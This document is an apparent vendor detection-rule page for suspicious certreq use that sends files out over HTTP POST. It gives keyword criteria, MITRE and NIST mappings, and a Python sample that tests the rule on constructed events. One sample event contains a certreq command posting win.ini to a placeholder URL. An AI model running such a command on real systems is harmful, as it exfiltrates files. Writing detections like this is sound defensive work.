Suspicious Certreq Command to Download or Upload

Rule added on 30th April, 2024

Rule type:

Correlation

Rule description:

The certreq command is used to perform certification management tasks such as requesting, accepting, installing and managing certificates. Attackers can misuse this command to perform an unauthorized download or upload of certificate-related files to a remote URL or server by making an HTTP POST request.

Impact:

It can impact organizations in the following ways:

  • Data breaches
  • Encryption of sensitive data
  • Data exfiltration
  • Operational disruption

Data source:

Windows:

Required configuration: The rule is based on process creation and termination events. Prerequisites are installing and configuring Sysmon, enabling the process creation audit policy, and enabling command line auditing.

Relevant MITRE ATT&CK techniques and tactics:

Tactics: TA0005 - Defense Evasion

Techniques: T1027 - Obfuscated Files or Information

Criteria:

(Original file name contains "certreq") OR (Command line contains "Post" AND Command line contains "Config" AND Command line contains "http" AND Command line contains "win.ini")

This rule is triggered when the original file name contains 'certreq', or when the command line contains all of 'Post', 'Config', 'http' and 'win.ini'.

Attackers may use the certreq command to perform an unauthorized upload or download of certificate-related files.

'Post' - The POST method is used for sending data to a server, indicating a possible upload of files.

'Config' - Indicates the configuration settings passed to the command, which attackers could manipulate to perform suspicious activity.

'http' - Indicates the HTTP protocol.

'win.ini' - A Windows system file that stores basic configuration information read during the boot process.
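To show how the criteria above behave on real telemetry, here is an added example (not vendor code from this page) that applies the rule as written to a few constructed process-creation events. Field names follow Sysmon Event ID 1 / Security 4688 conventions, and case-insensitive substring matching is an assumption about the SIEM's "contains" operator.

```python
"""Added example: evaluates this page's Certreq rule criteria against
constructed process-creation events. Field names and case-insensitive
matching are assumptions, not vendor specifics."""

# All four substrings must appear in the command line for the second clause.
CMDLINE_KEYWORDS = ("post", "config", "http", "win.ini")


def evaluate(event: dict) -> list[str]:
    """Return the clauses the event satisfies (empty list = no alert).

    Criteria as written on the page:
      (Original file name contains certreq)
      OR (Command line contains Post AND Config AND http AND win.ini)
    """
    original = (event.get("OriginalFileName") or "").lower()
    cmdline = (event.get("CommandLine") or "").lower()
    reasons = []
    if "certreq" in original:
        reasons.append("OriginalFileName contains certreq")
    if all(k in cmdline for k in CMDLINE_KEYWORDS):
        reasons.append("CommandLine contains Post, Config, http and win.ini")
    return reasons


def run_rule(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Apply the rule to a batch of events; returns (index, reasons) per hit."""
    return [(i, evaluate(ev)) for i, ev in enumerate(events) if evaluate(ev)]


# Constructed sample events (not real telemetry); the URL is a placeholder.
SAMPLE_EVENTS = [
    # 0: routine admin certificate request; matches on file name only, which
    #    is the known-false-positive case the page describes
    {"OriginalFileName": "CertReq.exe",
     "CommandLine": "certreq -new request.inf request.req"},
    # 1: Sysmon event carrying both the file name and the full keyword set
    {"OriginalFileName": "CertReq.exe",
     "CommandLine": "certreq -Post -config http://placeholder.invalid/ C:\\Windows\\win.ini"},
    # 2: 4688-style event with no OriginalFileName field; only the
    #    command-line clause can catch it
    {"CommandLine": "certreq -Post -config http://placeholder.invalid/ C:\\Windows\\win.ini"},
    # 3: unrelated process touching win.ini; must not alert
    {"OriginalFileName": "notepad.exe",
     "CommandLine": "notepad.exe C:\\Windows\\win.ini"},
]

if __name__ == "__main__":
    for idx, reasons in run_rule(SAMPLE_EVENTS):
        print(f"event {idx}: ALERT ({'; '.join(reasons)})")
```

Event 0 alerting on the file name alone is the administrator case listed under known false positives, so the returned reasons are useful triage context rather than just a boolean.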

When to enable this rule:

Enabling this rule will help you meet the security standards' requirements listed below:

Security standards (NIST CSF 2.0):

DE.CM-09: Computing hardware and software, runtime environments, and their data are monitored to find potentially adverse events

When this rule is triggered, you're notified that a suspicious Certreq command has been executed. This enables you to review access and permissions, take corrective actions, and monitor the use of the Certreq command.

Known false positives: This event may be generated by administrators performing certificate management tasks such as requesting, updating, or removing digital certificates on Windows.

Next steps:

When this alert is triggered, the following measures can be implemented:

  • Identification: Identify the alert as a new incident or within an ongoing incident.
  • Analysis: Analyze the impact and extent of the compromise to comprehend the severity of the attack.
  • Response: Respond promptly by initiating an automated workflow to cease the malicious process.
  • Deploy Access Controls: Implement access controls and permissions to restrict the execution of Certreq by unauthorized users.